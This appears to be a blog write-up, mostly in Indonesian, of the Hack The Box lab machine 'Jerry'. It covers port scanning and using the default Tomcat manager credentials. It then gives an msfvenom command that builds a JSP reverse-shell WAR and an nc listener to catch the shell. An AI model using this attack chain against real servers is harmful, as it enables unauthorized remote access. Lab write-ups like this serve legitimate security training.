HackTheBox Machine : Jerry Write Up

·

2 min read

Although Jerry is one of the easier machines on Hack The Box, it is realistic as Apache Tomcat is often found exposed and configured with common or weak credentials.

Seperti biasa pertama lakukan port scanning.

❯ nmap -sC -sV -T3 10.10.10.95 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-02 00:17 WIB
Nmap scan report for 10.10.10.95
Host is up (0.066s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.57 seconds

Dari hasil port scanning, kita dapatkan informasi bahwa hanya ada 1 port yang terbuka yaitu port 8080 dengan service Apache Tomcat versi 7.0.88.

Ketika button ‘Manager App’ diklik akan meminta username dan password seperti gambar di bawah ini.

Dan apabila memasukkan kredensial yang salah maka membuka page /manager/html seperti berikut.

Dari /manager/html kita dapatkan kredensial user. Username : tomcat Password : s3cret

Login kembali dengan kredensial di atas maka akan terbuka page berikut

Dari sini, kita ketahui bahwasanya web ini menerima .WAR file, WAR file (Web Application Resource atau Web application ARchive) merupakan sebuah file yang digunakan untuk mendistribusikan kumpulan JAR-files, JavaServer Pages, Java Servlets, Java classes, XML files, tag libraries, static web pages (HTML dan sejenisnya) ke dalam suatu web.

Untuk exploitnya, bisa kita ikuti Hacktricks, bisa menggunakan metasploit atau manual dengan msfvenom, kali ini saya akan menggunakan msfvenom agar sekalian belajar. Jangan lupa sesuaikan LHOST dan LPORT sesuai dengan IP dan Port listenernya. IPnya bisa dilihat dengan command ip a di bagian tun0 dan portnya bebas.

Berikut command msfvenomnya untuk menghasilkan revshell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war

Setelah itu jalankan listener dengan command nc -lvnp <port> sesuaikan port dengan port listenernya, lalu upload file revshell.war pada menu deploy di /manager/html tadi, setelah berhasil terupload akan seperti ini,

Buka tabnya dan listener akan mendapatkan koneksi.

Setelah itu cari lokasi flag user.txt dan root.txt.

cd ..\Users\Administrator\Dekstop\flags

Di dalam folder flags terdapat file yang bernama 2 for the price of 1.txt, untuk printnya bisa gunakan command type seperti gambar di bawah

Dan voila kita dapatkan flag user dan rootnya.